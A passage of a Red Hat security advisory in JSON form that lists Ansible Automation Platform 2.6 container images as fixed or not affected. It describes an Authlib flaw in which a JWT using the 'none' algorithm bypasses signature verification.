"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445120"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
